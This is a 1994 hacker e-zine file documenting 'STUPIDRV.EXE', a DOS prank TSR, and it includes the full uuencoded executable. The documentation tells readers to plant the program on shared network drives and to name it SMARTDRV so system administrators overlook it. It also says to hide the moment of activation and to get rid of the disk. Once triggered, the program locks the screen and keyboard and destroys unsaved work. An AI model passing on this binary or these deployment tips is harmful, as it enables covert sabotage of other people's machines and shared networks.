
                      %%%   %%%  %%%%  %%%   %%  %%%%%
                      %%%% %%%%   %%   %%%%  %%  %%  %%
                      %% %%% %%   %%   %% %% %%  %%   %%
                      %%  %  %%   %%   %%  %%%%  %%  %%
                      %%     %%  %%%%  %%   %%%  %%%%%

                  //     //    ////    //////   //////   //
                  \\  \  \\   \\  \\   \\   \\  \\   \\  \\
                  // /// //  ////////  //////   //////   //
                  \\\\ \\\\  \\    \\  \\ \\    \\         
                  ///   ///  //    //  //  //   //       //
 
               [ Mind Warp  -  Volume #1, Issue #1, File #012 ]
                        [ "STUPIDRV.EXE" by Mustaine ]
            
------------------------------------------------------------------------------
                        Documentation for STUPIDRV.EXE
                             [Mustaine/INFLUENZA]

     Hey folks, it's that time again!  This time we have one of MuSTaiNe's
annoying little TSR's that took absoultely NO talent or time to make.  The
dinky little program is perfect for wreaking havok on the unsuspecting boss 
or teacher.  It simply loads itself into memory, and when the time is right, 
'pops' up with some rather annoying little random boxes and noises that 
usually results in pissing the hell outta everyone around your workstation.  
It is especially nifty if you can save a copy of the .EXE to your local file 
server directory...maybe F:\COMMON or F:\PUBLIC...  system administrators 
take years on trying to find these things.
     The one kewl thing about this TSR is that it is currently available in
two versions, STUPIDRV and SMARTDRV, and coming soon...STUPIDRV AND SMARTDRV
II..where the times don't have to be manually inputed.  The reason's for 
calling it SMARTDRV is obvious...ever done a MEM /C /P from DOS?  You can see 
every TSR in memory from that thing.  But hey, have it called SMARTDRV and 
people usually overlook it.  STUPIDRV is just a funny way of letting someone 
know they are about to be royally fucked.
     Now here's how to run it.  Put the .EXE on your favorite diskette, or
hard drive, or netshared drive, and run it.  DUH.  With version 1 - this
version, DO NOT get caught initializing the program.  ( However a good batch 
programmer could probably find a way around this... )  There will be a simple 
line telling the current time, and asking for the hour.  This is the hour you 
want the program to go off.  Duh.  Then, viola, it askes for the minute.  
This would be the minute the program will go off.  Pretty easy, eh?  Then hit 
enter and it's all set.  If I were you, I would ditch your disk.  This 
program, once activated, freezes the screen, and keyboard, and makes a 
helluva a lot of noise and pretty colors.  Now here comes my dinky
DISCLAIMER:
     THIS PROGRAM IS BAD.  DON'T RUN IT ON YOUR MACHINE.  IT WILL ROYALLY
FUCK UP WHAT YOU WERE WORKING ON, AND YOU PROBABLY WILL HAVE TO REBOOT.  IF 
YOUR WIFE LEAVES YOU, YOUR DOG STARTS SPURTING HIS LOVE FOR THE ANTICHRIST, 
YOUR TOE SPRING UP WITH MOLES AND WARTS, YOUR COMPUTER HAS A HERNIA, IT IS 
NOT MY FAULT.  YOU HAVE BEEN FORWARNED.  YOU CAN NOT TURN THIS THING OFF ONCE 
ACTIVATED FULLY.  HAVE A NICE DAY.
     Having said that, I will take my leave of this documentation.  Too long
for a dinky TSR anyway.  Enjoy, and later.

                        MuSTaiNe / iNFLueNZa iNC.
       STUPIDRV,SMARTDRV Copyright (c) 1994 MuSTaiNe / iNFLueNZa iNC.

------------------------------------------------------------------------------
The following is STUPIDRV.EXE:

section 1 of uuencode 2.8 of file stupidrv.exe    by R.E.M.

begin 644 stupidrv.exe
M35KP``T`8@`;`&<`IP";`0`$``"=`@``'`````P```!B````;````'8```"FQ
M````L````+H````,`0``%0$``!X!```G`0``,`$``#D!``!"`0``2P$``%0!L
M``!=`0``9@$``&\!``!X`0``@0$``(H!``"3`0``G`$``*4!``"N`0``MP$`L
M`+\!``#(`0``U0$``.H!``#]`0``#`(``!4"```;`@``(`(``"4"```J`@``"
MH`(``*4"``"O`@``M`(``-<"``#A`@``Y@(``/@"```'`P``$@,``"$#```LS
M`P``.P,``$`#``!%`P``5P,``%P#``!A`P``:0,``',#``![`P``@`,``(@#A
M``"A`P``I@,``*L#``"S`P``O0,``,4#``#*`P``T@,``.L#``#Z`P``!00`<
M`!0$```9!```'@0``"<$```O!```000``$8$``!+!```5`0``%P$``!A!```6
M:@0``'$$``!Y!```@00```D`20`D`$D`-P!)`#L!20`!`+<`&P&W`!`#MP`;6
M";<`-@FW`$P)MP!K";<`````````````````4%-14E97'@95B>6X;@&.V/\&;
M6@"#/EH`$G0#Z14",<"C6@"X0`!0OVX`!R:+!3'2N1@`]_&2,=*C8`")%F(`5
MN$``4+]L``<FBP4QTJ-D`(D69@"A9`"+%F8`N04`,=N:O0>W`+E5%3';FOH'#
MMP"Y/``QVYKZ![<`B<B)VJ-D`(D69@"X0`!0OVP`!R:+!3'2HV@`B19J`*%H9
M`(L6:@"Y!0`QVYJ]![<`N5L`,=N:^@>W`+D\`#';FOH'MP")R(G:HV@`B19JM
M`*%<`#'2.Q9B`'0#Z5X!.P9@`'0#Z54!H5X`,=([%F8`=`/I1P$[!F0`=`/I=
M/@&#/FH``'0#Z30!@SYH``%T`^DJ`9IB"K<`N&0`4)K4`DD`N`4`4)JH`DD`4
MN,@`4)K4`DD`N`H`4)JH`DD`N"P!4)K4`DD`N`4`4)JH`DD`N)`!4)K4`DD`E
MN`H`4)JH`DD`N/0!4)K4`DD`N`4`4)JH`DD`N%@"4)K4`DD`N`H`4)JH`DD`^
MN+P"4)K4`DD`N`4`4)JH`DD`N"`#4)K4`DD`N`H`4)JH`DD`N(0#4)K4`DD`9
MN`4`4)JH`DD`N.@#4)K4`DD`L`!0FGT"20"X4`!0FLT)MP!`HFP`N!D`4)K-0
M";<`0*)M`*!L`%"@;0!0N`H`4)K-";<`B]"@;``PY`/"4+@(`%":S0FW`(O0L
MH&T`,.0#PE":C`%)`+@0`%":S0FW`%":?0))`)K,`4D`F@$#20":"`-)``C`-
M=0/IV_Y=!Q]?7EI96UC/!E1I;64Z(`I3970@2&]U<CH@#%-E="!-:6YU=&4Z#
M(!%!8W1I=F%T:6]N(%1I;64Z("X@("`@("`@("`@("`@("`@("`@($-90F52B
M4$AU0TME1"!7:51((%-4=5!I1%)6F@``MP":#0!)`%6)Y3'`FLT"MP":S`%)+
M`#'`HUH`Q@9N``"_4@`>5[]4`!Y7OU8`'E>_6``>5YHV`*L`OX(!'E>:W06WO
M`)J1`K<`OX(!'E>_/0(.5S'`4)H!![<`H5(`,=)24#'`4)J)![<`L#I0,<!06
MFGL&MP"A5``QTE)0,<!0FHD'MP"P.E`QP%":>P:W`*%6`#'24E`QP%":B0>W/
M`)K=!;<`FI$"MP"_@@$>5[]$`@Y7,<!0F@$'MP":_@6W`)J1`K<`L`Y0FF,"H
M20"_@@`>5YHM![<`HUP`FIT%MP":D0*W`+`'4)IC`DD`H%P`/!=WMK^"`1Y7\
MOT\"#E<QP%":`0>W`)K^!;<`FI$"MP"PA%":8P))`+^"`!Y7FBT'MP"C7@":J
MG06W`)J1`K<`L`=0FF,"20"@7@`\.W>VOX(!'E>_7`(.5S'`4)H!![<`H5P`2
M,=)24#'`4)J)![<`L#I0,<!0FGL&MP"A7@`QTE)0,<!0FHD'MP":W06W`)J1'
M`K<`N-`'4)JH`DD`L(10FF,"20"_@@$>5[]N`@Y7,<!0F@$'MP":W06W`)J1Z
M`K<`N-`'4)JH`DD`L`=0FF,"20":S`%)`+`<4+\``+@``%!7FHH`JP`QP%":.
MG0"K`%TQP)H6`;<``````````````````%6)Y;C_`)H6`;<`7<-5B>7H*`"_S
M@@`>5P[H(`._@@`>5YID`[<`OX(!'E<.Z`T#OX(!'E>::0.W`%W+M`_HU`4\%
M!W0*/`-V!K@#`.A5`.B?`+0(,O_HO`6*Q"1_HGX`HG0`,\"B;P"B?P"B@`!`R
MHFX`C@9$`+]L`":*'28Z'73[)HH=N.3_F>@\`O?0]]*Y-P#W\:-Z`!X.'[HX3
M`;@;)<TA'\..!D0`)H`FAP#^/`=T!CP$<@*P`U"T`.A7!5@*Y'0MN!(1LP#HX
M2@6X,!&W`+(`Z$`%@/HJ=18F@`Z'``&X``&Y``;H+`6T$K,@Z"4%P[0/Z!\%Y
M4+@P$;<`L@#H%`58L0`*TG4(LA@\`W<"L0&*\HK4_LJT`(#^&'8"M`&C<@")3
M%GP`B`YQ`,8&<``!,\"C=@")%G@`PU`>N&X!CMB`/FX``'0%Q@:```$?6,^`)
M/H```'4!P\8&@```M`'-%G0&M`#-%NOTL%[H'0.P0^@8`^@.`^F)_HO<-HM'V
M!.@C_^AM_Z!^`*)T`,H"`(O<-HI7"C:*=P@VBD\&-HIO!#K1=R<Z]7<C_LIX?
M'_[.>!O^R3H.?`!W$_[-.BY]`'<+B19V`(D.>`#H00/*"`"X``:*/G0`BPYVQ
M`(L6>`#H-@2+%G8`Z"4#R^@:`[@`!HH^=`"+RHH6>`#H&P3+N`$'ZP.X`090)
MZ/T"6(H^=`"*#G8`BNZ+%G@`.NYU`C+`Z/8#RXO<-HI7!C:*=P3^R@(6=@!R[
M%SH6>`!W$?[.`C9W`'().C9Y`'<#Z,("R@0`Z+4"BL(J!G8`_L#+Z*D"BL8JL
M!G<`_L#+B]PVBD<$J/!T!"0/#("`)G0`<`@&=`#*`@"+W#:*1P0D![$$TN"`9
M)G0`CP@&=`#*`@"`)G0`]\N`#G0`",N@?@"B=`#+B]PVBT\$XQ..!D0`,_\F2
MBAVA>@`STN@%`.+VR@(`+0$`@]H`<@4F.AUT\\.+W#:+7P2XW32Z$@`[TW,:T
M]_.+V.1AJ`-U"`P#YF&PMN9#BL/F0HK'YD+*`@#D823\YF'+@#Y_``!U"+0!W
MS1:P`'0"L`'+H'\`Q@9_```*P'42,N3-%@K`=0J()G\`"N1U`K`#Z!/^RXO<V
M'C;%?P3'10*PU\=%!(``C86``(E%#(Q=#L=%$&<#C$T2QD4P`!_*!`"+W!XV$
MQ7\$N)\#NWT$B\N!?0*QUW0*QT4"LM>X3`2+V(E%%(Q-%HE=&(Q-&HE-'(Q--
M'C/`'\H$`%6+[,1^!B:+501*2B:+=0@FQ'T,,]O&!G\```[H7/^Y`0`\"'0TK
M/!-T,#P$=$1)/!MT)SP!=",\!G0W/!IT1CP-=$\\('+/.]ITRR:(`4/HF``[]
MWG;`B_/KO`O;=+BP".B'`+`@Z((`L`CH?0!+XNKKI#O>=*`FB@$\('*9Z&H`%
M0^+OZY&`/F\``'2*)H@!0^L*Z$X`)L<!#0I#0\1^!C/`)HE%"":)70I=R@0`1
MB]PVQ'\$)HM-""8I30CC&2;$?0R`/G```'4+)HH%Z!P`1^+WZP/HG`#HUOPS>
MP,H$`#/`R@0`L`WH`@"P"E-14@90Z'(`6#P'="H\"'0M/`UT,SP*=#6T"8H>X
M=``R_[D!`%+H8P%:_L(Z%G@`=B"*%G8`ZQ>T#NA/`>L3.A9V`'0-_LKK"8H6+
M=@#K`^@(`.@M``=:65O#_L8Z-GD`=AC^SE%2N`$&BCYT`(L.=@"+%G@`Z!0!Q
M6EG#M`,R_^D*`;0",O_I`P$>CAY$`(L64``?B]J+]R:*!3P'="$\"'0L/`IT=
M-3P-=#E'_L(Z%G@`=CSH;@#HH?^*%G8`ZRSH8@!14K@'#NC"`%I9ZQSH4P`Z.
M%G8`=!/^RNL/Z$8`Z'G_ZP?H/@"*%G8`1XOWB]KBIN@P`!Z.'D0`B190`(K&2
M]B9*`#+V`\*+R(L68P"P#N[K`(K%0N[K`$JP#^[K`(K!0NX?PSOW=&-14E<>+
M!HO/*\X>CAY$`(K']B9*`#+_`\/1X(OXBQ9C`(/"!H`^20`''Z%*`'4#H4@`2
MBAYQ`(H^=``&'X[`_`K;=!:LBMCLJ`%U^_KLJ`%T^XO#J_OB[.L&BN>LJ^+\`
M!Q]?6EG#5E=5!LT0!UU?7L,`58OLM"K-(3+DQ'X&JXK"Q'X*JXK&Q'X.JY'$@
M?A*K7<H0`%6+[(M."HIV"(I6!K0KS2%=R@8`58OLM"S-(3+DBL+$?@:KBL;$=
M?@JKBL'$?@ZKBL7$?A*K7<H0`%6+[(IN#(I."HIV"(I6!K0MS2%=R@@`58OLX
MBD8*M#7-(8S`Q'X&_).KDZM=R@8`58OL'L56!HI&"K0ES2$?7<H&`%6+[*$XH
M`([`)HL6`@`KT(I&!K0QS2%=R@(`````````````NFX!CMJ,!C@`,^WH1`OH"
MH`"+Q`43`+$$T^B,T@/"HPH`HPP``P8$`*,.`*,8`*,<`*,D`(X&.``FH0(`Q
MHR``QP8J`-8`C`XL`+^"`KXY`KD3`)#\+JRT-<TAB1V,10*#QP3B[QX.'[H,T
M`;@`)<TANA,!N",ES2&ZVP"X)"7-(;H$`;@_)<TA'[B"`!Y0'E"X8P(.4`[HT
M3@(.Z,@"N((!'E`>4+AC`@Y0#N@Z`@[HN0++,\"<6X#G#U.=G%F`Y?"`_?!TH
M#D"`S_!3G9Q9@.7P=`%`HDP`PS/`R@(`^X/$!EB#YQ^!QY8`@/PY<P.___]7:
MM%3-(8OL@$X6`5A;65I>7UT?!\^XT`"#Q`;K`[C(`%E;ZP>X_P`SR3/;NFX!-
MCMK[HS(`B\$+PW0]H1``"\!T+X[`)J$0``O`=!LKPW<7]]@]`!!S$+H0`/?B,
M`\%R!R8[!@@`<@8FH10`Z]&+R(S#*QXX`(/K$(D.-`")'C8`Q!XN`(S`"\-T,
M$S/`HRX`HS``HSP`N&X!#E`&4\NX@@`>4`[H*@*X@@$>4`[H(0*_@@*^.0*YS
M$P"0_"ZLM"4>Q17-(1^#QP3B\*$T``L&-@!T*;M,`N@J`*$R`.@R`+M;`N@>K
M`*$V`.A``+`ZZ%4`H30`Z#4`NV`"Z`<`H3(`M$S-(2Z*!PK`=`;H.`!#Z_/#.
ML63H!P"Q"N@"`.L$,N3V\00P4.@>`%B*Q,-0BL3H`0!84+$$TNCH`P!8)`\$#
M,#PZ<@($!XK0M`;-(<,``ALA(R0T-38W.#DZ.SP]/C]U4G5N=&EM92!E<G)O5
M<B``(&%T(``N#0H`4&]R=&EO;G,@0V]P>7)I9VAT("AC*2`Q.3@S+#DR($)O9
M<FQA;F0SP(<&/`#+@SX\``!U`<NA/`#I</Z+]#:.1`(F.U4"?P=\%"8[!7(/3
M)CM5!GP(?P<F.T4$=P'+N,D`Z4C^N-<`Z4+^!0`"<@TKQ',)]]@[!CH`<@'+]
MN,H`Z2K^NC/2B]P>-L1_"#;%=P3\,\"KN+#7J[B``*LSP*NKJXU%=*N,P*NXH
MY@BKN+<`JS/`N0X`\ZNY3P`+TG4)K#K(=@2*R.,(K`K`=`.JXO@RP*H?R@@`E
MB]PVQ'\*-HM'!":)100VBT<&)HE%##:+1P@FB44.,\`FB44()HE%"LH*`+JQW
MU^L(NK+7ZP.ZL]=5B^S$?@8FBT4"/;'7=!(]LM=T#3VPUW00QP8\`&8`ZR12N
M!E<.Z"4`6C/`)HE5`B:)10@FB44*NQ``Z$P`=`8FQT4"L-==R@0`L`#K`K`!1
M58OLQ'X&)H%]`K'7=!@F@7T"LM=T",<&/`!G`.L84+L4`.@5`%@*P'0,NQP`A
MZ`H`)L=%`K#77<H$``97!E<F_QD+P'0#HSP`7P?#B]P>-L1_!";%50PFBTT$T
M)HL=M#_-(7(0)HE%"C/`)L=%"```'\H$`";'10H``.ONB]P>-L1_!";%50PS]
MR2:'30@FBQVT0,TA<@<KP70#N&4`'\H$`(O<'C;$?P0FQ54,,\DFATT()HL=T
MM$#-(7(",\`?R@0`B]PVQ'\$)HL=@_L$=@:T/LTA<@(SP,H$`(,^/```=34F^
M@7\"L==U+B:+=P@F.W<*="L>!E-2)L57#":+7PH'`]H#\OS_T"ORC,);!Q\F2
MB7<("\!U",/'!CP`:`##4%%25P93Z#,!6P=?6EE8)HMW""8[=PIUO,.#/CP`3
M`'5`)H%_`K+7=3DFBT\$)HM_""O/*]%S!`/*,](&)L1W#`/^L"#\\ZHK_@<FA
MB7\()CM_!'4)4@93Z.(`6P=:"])UR,/'!CP`:0##@SX\``!U2":!?P*RUW5!U
M)HM/!":+?P@KSRO!<P0#R#/`'@93CMHFQ%\,`_O\\Z0K^UL''R:)?P@F.W\$-
M=0U04E8&4^B-`%L'7EI8"\!UP,/'!CP`:0##58OLQ%X&N+L%,]+H[OYU"B:#$
M?QH`=`/H<`!=R@0`K#P-=`P\&G01._-U\[B[!<,[\W0)K#P*=`%.,\##N-`%C
MPU6+[,1>!K@"`+Y0`(S:Z%C_=0HF@W\:`'0#Z"T`7<H$`%6+[,1>!B:#?QH`Y
M=`J#/CP``'4#Z!(`7<H$``93)O]?%`O`=`.C/`##!E,F_U\8"\!T`Z,\`,-5&
MB^R#/CP``'4XQ%X&)H%_`K'7=2<FBW\()CM_"G40Z,+_Q%X&)HM_""8[?PIT3
M$R;_1P@FQ%\,)HH!7<O'!CP`:`"P&NOT58OLQ%X*BU8&2GX#Z&W^@SX\``!UJ
M*2:!?P*RUW4E)O]'"":+?P@FBU<$)L1?#(I&"":(0?\[^G4&Q%X*Z%__7<H$6
M`,<&/`!I`.OT58OLQ%X,N.D&BTX&BWX(BU8*1^B]_8O'Q'X(*\=(JEW*!@"LC
M/`UT#SP:=`NJ._/@\N,%N.D&PTXSP,-5B^S$7@@FB@<RY,1>#(M6!BO0?@50C
MZ-W]6`O`=`J+=@B+5@I&Z!W^7<H&`%6+[(/L(,1>!KAD![D@`(U^X(S2Z%7]<
MB\^-?N`KSW0/%@?H60-R`N,*QP8\`&H`,\"+T(OE7<NL/"!W$3P:=!@[\W7ST
MN&0'PZP\('8+JCOSX/;C!;AU!\-.,\##58OL@^P@BT8(BU8*C7X`%@?HT@+$%
M7@R+5@8KT7X'45?H2_U?68O!B_>,TNB/_8OE7<H&`(`^3``"<AMFP>`09@^L_
MT!!FP>$09@^LV1!F]^EF#Z3"$,N+\(OZ]^%04HO&]^.+V(O']^&+R%I8`],#V
MT<N`/DP``G(G9L'@$&8/K-`09L'A$&8/K-D0=%YFF6;W^6:+RF8/I,(09@^D5
MRQ#+53/M"])Y"$7WV(/2`/?:"]MT/GD+147WV8/3`/?;=#-5B_&+^S/;B\J+D
MT#/`O1``T>#1TM'1T=-`*\X;WW,%2`/.$]]-=>E=ZQ9=N,@`Z9;XX_>3DO?Q^
MD_?QB\J+TS/;T>US"/?9@],`]]M%374']]B#T@#WVEW+@#Y,``)R$&;!XA"+M
MT&;3ZHO"9L'J$,N#X1]T!M'JT=CB^LN`/DP``G(09L'B$(O09M/BB\)FP>H0>
MRX/A'W0&T>#1TN+ZRXO<'C;%?P0SR8D-N``]@7T"L==T#;`"_P6!?0*SUW0")
MM#R`?3``=`F-53#-(7):B06X"P2ZMP`SR3/;@7T"L==T+XL=N`!$S2'VPH"XU
M8`2ZMP"+R(O:=12!?0*SUW4#Z"L`N#L$NK<`,\DSV\=%`K+7B444B546B4T8`
MB5T:QT4<@`3'11ZW`#/`'\H$`#/2,\F+';@"0LTA+8``@]H`<P0SP#/2B\J+X
MT(L=N`!"S2&-E8``N8``BQVT/\TA<P(SP#/;.]AT(("Y@``:=`-#Z_*+TRO07
MN?__BQVX`D+-(3/)BQVT0,TAP^A:`(O<B\HV]V<$B\&+RC;W9P0#P8/2`(O"(
MR@(`Z#T`D[B``+D@`/;&@'4*T>/1TO[(XO,RP(#F?\OH(`#-/)\&*`K--P8^G
M`,T\F`8D"LTU_<TYV<T]RP```$_@_Z$^`(L>0`"+R"[W)F`*T>'1X='A`ND#*
MT0/3T>/1XP/3`O.Q!=/C`O,%`0"#T@"C/@")%D``PP6$M"S-(8D./@")%D``O
MRXO/O@H`B]H+VWD1]]OWV(/;`.@'`$\FQ@4M0<,STI/W]I/W]H#",(#Z.G(#]
M@,('3R:(%8O0"]-UXRO/PS/`,](S]N-=)H`]*W0')H`]+74%3D=)=$PF@#TDP
M=$@FBAV`ZSJ`PPIS)?;&\'4V4]'@T=)24-'@T=+1X-'26P/#6Q/36S+_`\.#A
MT@!'XM"+V`O:=`\+]GD']]KWV(/:`#/R>`'#^<-'273Z)HH=@/MA<@.`ZR"`^
MZSJ`PPIR"X#K%X##!G/)@,,*MP31X-'2<M3^SW7V"L-'XM$+]GD']]KWV(/:W
M`/C#OU(`'@>YS@(KS]'I,\#\\ZO#````````````````````````````````T
M``````````#__P``````````````````````````````````````````````Q
G`````````````!!```"@`+``N````@`-"@``````````````````L
``
end
size    6384


==============================================================================
       Call Arsonist's Arsenal BBS the Mind Warp WHQ - (301) 208-0847
==============================================================================
